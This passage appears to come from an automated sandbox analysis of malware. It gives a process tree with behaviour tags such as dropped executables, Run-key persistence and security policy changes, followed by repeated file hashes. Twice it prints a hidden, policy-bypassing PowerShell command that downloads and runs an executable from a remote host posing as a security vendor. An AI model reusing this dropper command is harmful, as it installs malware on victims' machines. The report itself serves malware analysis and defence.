PID:1444 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 54⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:540 -
C:\Users\Admin\AppData\Local\Temp\EXCEL.exeC:\Users\Admin\AppData\Local\Temp\EXCEL.exe4⤵
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:1868 -
C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Admin\AppData\Local\Temp\EXCEL.exe5⤵
- Adds policy Run key to start application
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1200 -
C:\Windows\SysWOW64\notepad.exenotepad.exe6⤵PID:1424
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://avira.ydns.eu/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"2⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Users\Admin\AppData\Roaming\EXCEL.exe"C:\Users\Admin\AppData\Roaming\EXCEL.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:468 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute twitch.com4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1432 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 54⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1164 -
C:\Users\Admin\AppData\Local\Temp\EXCEL.exeC:\Users\Admin\AppData\Local\Temp\EXCEL.exe4⤵
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:1156 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://avira.ydns.eu/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"2⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Users\Admin\AppData\Roaming\EXCEL.exe"C:\Users\Admin\AppData\Roaming\EXCEL.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1228 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute twitch.com4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1324 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 54⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1000 -
C:\Users\Admin\AppData\Local\Temp\EXCEL.exeC:\Users\Admin\AppData\Local\Temp\EXCEL.exe4⤵
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:1524 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:928
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
cb12b24b0f69225693168e9c35761a1b
SHA10f68f676d76e3546d7d625cdb14f0947c59beff5
SHA256c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535
SHA5129d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65
-
MD5
cb12b24b0f69225693168e9c35761a1b
SHA10f68f676d76e3546d7d625cdb14f0947c59beff5
SHA256c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535
SHA5129d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65
-
MD5
cb12b24b0f69225693168e9c35761a1b
SHA10f68f676d76e3546d7d625cdb14f0947c59beff5
SHA256c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535
SHA5129d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65
-
MD5
cb12b24b0f69225693168e9c35761a1b
SHA10f68f676d76e3546d7d625cdb14f0947c59beff5
SHA256c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535
SHA5129d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65
-
MD5
cb12b24b0f69225693168e9c35761a1b
SHA10f68f676d76e3546d7d625cdb14f0947c59beff5
SHA256c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535
SHA5129d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65
-
MD5
cb12b24b0f69225693168e9c35761a1b
SHA10f68f676d76e3546d7d625cdb14f0947c59beff5
SHA256c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535
SHA5129d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65
-
MD5
cb12b24b0f69225693168e9c35761a1b
SHA10f68f676d76e3546d7d625cdb14f0947c59beff5
SHA256c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535
SHA5129d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65
-
MD5
cb12b24b0f69225693168e9c35761a1b
SHA10f68f676d76e3546d7d625cdb14f0947c59beff5
SHA256c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535
SHA5129d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65
-
MD5
cb12b24b0f69225693168e9c35761a1b
SHA10f68f676d76e3546d7d625cdb14f0947c59beff5
SHA256c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535
SHA5129d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65
-
MD5
cb12b24b0f69225693168e9c35761a1b
SHA10f68f676d76e3546d7d625cdb14f0947c59beff5
SHA256c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535
SHA5129d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5ecfaebcb54319b58ed43fbd2ba573372
SHA1b44215acc3eeeedf6ba19e9123f9bef5e638217c
SHA2568e15f4bf5f1a8974bbcebedaec9dd164e6dff8bde3e2d65d0ac3451885e5852e
SHA5122f4a6db897b49c7e9842a7c4cce409f1b5d03ed3b59ba962c266a79774dfcffff1f9f8f24a93710bc199e7c4a516d663c734c9eb83ec1d9a9dabe95d98a91384
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5ecfaebcb54319b58ed43fbd2ba573372
SHA1b44215acc3eeeedf6ba19e9123f9bef5e638217c
SHA2568e15f4bf5f1a8974bbcebedaec9dd164e6dff8bde3e2d65d0ac3451885e5852e
SHA5122f4a6db897b49c7e9842a7c4cce409f1b5d03ed3b59ba962c266a79774dfcffff1f9f8f24a93710bc199e7c4a516d663c734c9eb83ec1d9a9dabe95d98a91384
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5ecfaebcb54319b58ed43fbd2ba573372
SHA1b44215acc3eeeedf6ba19e9123f9bef5e638217c
SHA2568e15f4bf5f1a8974bbcebedaec9dd164e6dff8bde3e2d65d0ac3451885e5852e
SHA5122f4a6db897b49c7e9842a7c4cce409f1b5d03ed3b59ba962c266a79774dfcffff1f9f8f24a93710bc199e7c4a516d663c734c9eb83ec1d9a9dabe95d98a91384
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5ecfaebcb54319b58ed43fbd2ba573372
SHA1b44215acc3eeeedf6ba19e9123f9bef5e638217c
SHA2568e15f4bf5f1a8974bbcebedaec9dd164e6dff8bde3e2d65d0ac3451885e5852e
SHA5122f4a6db897b49c7e9842a7c4cce409f1b5d03ed3b59ba962c266a79774dfcffff1f9f8f24a93710bc199e7c4a516d663c734c9eb83ec1d9a9dabe95d98a91384
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5ecfaebcb54319b58ed43fbd2ba573372
SHA1b44215acc3eeeedf6ba19e9123f9bef5e638217c
SHA2568e15f4bf5f1a8974bbcebedaec9dd164e6dff8bde3e2d65d0ac3451885e5852e
SHA5122f4a6db897b49c7e9842a7c4cce409f1b5d03ed3b59ba962c266a79774dfcffff1f9f8f24a93710bc199e7c4a516d663c734c9eb83ec1d9a9dabe95d98a91384
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5ecfaebcb54319b58ed43fbd2ba573372
SHA1b44215acc3eeeedf6ba19e9123f9bef5e638217c
SHA2568e15f4bf5f1a8974bbcebedaec9dd164e6dff8bde3e2d65d0ac3451885e5852e
SHA5122f4a6db897b49c7e9842a7c4cce409f1b5d03ed3b59ba962c266a79774dfcffff1f9f8f24a93710bc199e7c4a516d663c734c9eb83ec1d9a9dabe95d98a91384
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5ecfaebcb54319b58ed43fbd2ba573372
SHA1b44215acc3eeeedf6ba19e9123f9bef5e638217c
SHA2568e15f4bf5f1a8974bbcebedaec9dd164e6dff8bde3e2d65d0ac3451885e5852e
SHA5122f4a6db897b49c7e9842a7c4cce409f1b5d03ed3b59ba962c266a79774dfcffff1f9f8f24a93710bc199e7c4a516d663c734c9eb83ec1d9a9dabe95d98a91384
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5ecfaebcb54319b58ed43fbd2ba573372
SHA1b44215acc3eeeedf6ba19e9123f9bef5e638217c
SHA2568e15f4bf5f1a8974bbcebedaec9dd164e6dff8bde3e2d65d0ac3451885e5852e
SHA5122f4a6db897b49c7e9842a7c4cce409f1b5d03ed3b59ba962c266a79774dfcffff1f9f8f24a93710bc199e7c4a516d663c734c9eb83ec1d9a9dabe95d98a91384
-
MD5
cb12b24b0f69225693168e9c35761a1b
SHA10f68f676d76e3546d7d625cdb14f0947c59beff5
SHA256c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535
SHA5129d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65
-
MD5
cb12b24b0f69225693168e9c35761a1b
SHA10f68f676d76e3546d7d625cdb14f0947c59beff5
SHA256c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535
SHA5129d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65
-
MD5
cb12b24b0f69225693168e9c35761a1b
SHA10f68f676d76e3546d7d625cdb14f0947c59beff5
SHA256c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535
SHA5129d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65
-
MD5
cb12b24b0f69225693168e9c35761a1b
SHA10f68f676d76e3546d7d625cdb14f0947c59beff5
SHA256c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535
SHA5129d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65
-
MD5
cb12b24b0f69225693168e9c35761a1b
SHA10f68f676d76e3546d7d625cdb14f0947c59beff5
SHA256c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535
SHA5129d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65
-
MD5
cb12b24b0f69225693168e9c35761a1b
SHA10f68f676d76e3546d7d625cdb14f0947c59beff5
SHA256c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535
SHA5129d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65